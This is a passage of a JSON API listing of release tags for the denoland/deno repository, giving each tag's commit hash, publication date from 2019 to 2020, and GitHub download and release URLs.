ags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.c